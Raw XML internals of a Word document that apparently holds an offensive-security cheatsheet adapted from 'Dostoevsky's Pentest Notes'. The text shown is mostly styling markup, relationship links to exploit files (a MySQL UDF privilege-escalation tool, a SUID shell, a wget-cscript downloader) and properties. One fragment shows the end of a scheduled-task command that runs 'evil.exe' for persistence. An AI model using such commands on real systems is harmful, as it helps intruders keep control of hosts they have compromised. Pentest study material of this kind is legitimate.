        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>" /tr C:\Windows\system32\evil.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446F0742" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2AA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3C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This was inspired by and forked/adapted/updated from </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="003C2AAC">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="6FAB07"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Dostoevsky's Pentest Notes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7667F134" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRDefault="003C2AAC"/>
    <w:p w14:paraId="58B0F185" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRDefault="003C2AAC"/>
    <w:sectPr w:rsidR="003C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D2667"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E7DE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AC"/>
    <w:rsid w:val="003C2AAC"/>
    <w:rsid w:val="006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1241"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F3B8B5BD-3E28-4B38-A6FF-BC2F77A2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A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2A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2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A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AA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2A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2A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2AA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C2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3C2AAC"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="small-3bde6db7--icononly-bddce91a">
    <w:name w:val="small-3bde6db7--icononly-bddce91a"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003C2AAC"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-4505230f--uih300-2063425d--textuifamily-5ebd8e40--text-8ee2c8b2">
    <w:name w:val="text-4505230f--uih300-2063425d--textuifamily-5ebd8e40--text-8ee2c8b2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003C2AAC"/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C2AAC"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-4505230f--headingh700-04e1a2a3--textcontentfamily-49a318e1">
    <w:name w:val="text-4505230f--headingh700-04e1a2a3--textcontentfamily-49a318e1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003C2AAC"/>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003C2AAC"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="blockheadinganchoricon-1c2bf3cb">
    <w:name w:val="blockheadinganchoricon-1c2bf3cb"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003C2AAC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C2A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AAC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DefaultParagraphFont"/>
    <w:rsid w:val="003C2AAC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="blockparagraph-544a408c">
    <w:name w:val="blockparagraph-544a408c"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="003C2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headingh400-686c0942--textcontentfamily-49a318e1">
    <w:name w:val="text-4505230f--headingh400-686c0942--textcontentfamily-49a318e1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003C2AAC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="blockparagraph-544a408c--nomargin-acdf7afa">
    <w:name w:val="blockparagraph-544a408c--nomargin-acdf7afa"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="003C2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4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314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5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70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87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2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79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7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6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31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100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8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489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8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6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86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6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20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94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59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9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2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29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321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410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9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5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3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87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8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26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479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13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7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17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22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07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06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57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1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14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15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80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07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71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24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9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18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7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424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772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3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5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9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2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40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31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26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37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02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8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3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39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83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9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20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1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4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68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24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3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26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1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5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3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805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8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359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1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00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10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1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38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7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88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1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99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1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35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52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0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8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7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7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83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48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5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77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85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5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6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9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5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7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82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7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6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34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66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47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2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98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22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4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2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32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02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1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0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68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1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5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39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084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5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6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143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93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5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0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33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0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31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7392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6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4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63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5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3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288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52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3644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7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2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0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24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6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23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2851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97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0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4468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1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88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2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3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71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8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626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0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0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67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9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05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0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753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7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3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8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9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37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5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730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0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0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0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0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0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24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1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20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71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7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62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54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5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5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47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50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6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75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429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9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1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593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98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50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1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44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7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057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88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82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1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8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25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4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936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37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63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41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91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0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0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82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8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18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30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20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2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39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1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6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0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38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0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0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78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11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1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322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5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205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3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7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55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14374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5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2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9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1994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86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52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186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1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3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44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2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6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062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3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6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2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776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1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69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302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9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5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8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1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0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6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0315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0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2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82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2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0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4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965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9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673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1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71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55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0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99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40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496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0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5899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9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9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81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9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9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81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66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0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6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7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110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0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30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03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0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5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92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03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2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582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7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0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04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45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43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96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0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24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57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88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6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4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4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8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328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8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0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15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3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47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20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2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8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1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01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1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68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9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51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02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3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86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2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8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985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10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03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06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406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3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9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64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93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0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2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26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2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4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60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7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6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7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9028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1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82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96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41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31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24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4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5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85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6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5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922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5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3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6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96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081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94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45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6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287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7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6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3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9697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9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89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90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0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3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63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63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0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8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4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293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26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85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9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19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9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41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53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229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06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89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37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78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2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28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9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9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04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5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63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45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1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8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2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8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81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43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88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4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8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21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2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70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1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3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36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2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891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5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86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8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33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9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379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9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5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64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41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1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70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8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66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3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1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736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3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6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90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00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7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305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5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4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27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57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51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67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3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5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32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7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5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54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22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0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77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2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9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4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786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1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65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3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26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92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78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8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09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45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57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5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22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7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677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2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133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1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559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295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2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4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45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4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54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2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83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25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78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21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96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526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02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86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295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789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7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61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16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25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50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2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8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45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55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79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3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36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3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8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8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2320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6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9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2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8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7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2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tvydasb/Offensive-Security-Cheatsheets/blob/master/raptor_udf2.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dostoevskylabs/dostoevsky-pentest-no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tvydasb/Offensive-Security-Cheatsheets/blob/master/sid-shell.c" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mantvydasb/Offensive-Security-Cheatsheets/blob/master/wget-cscript" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ired.team/offensive-security-experiments/offensive-security-cheetsheets" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mantvydasb/Offensive-Security-Cheatsheets/blob/master/raptor/raptor.t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tvydasb/Offensive-Security-Cheatsheets/blob/master/sid-shell.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3591</Words>
  <Characters>20469</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>170</Lines>
  <Paragraphs>48</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>24012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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-28T16:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-28T16:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>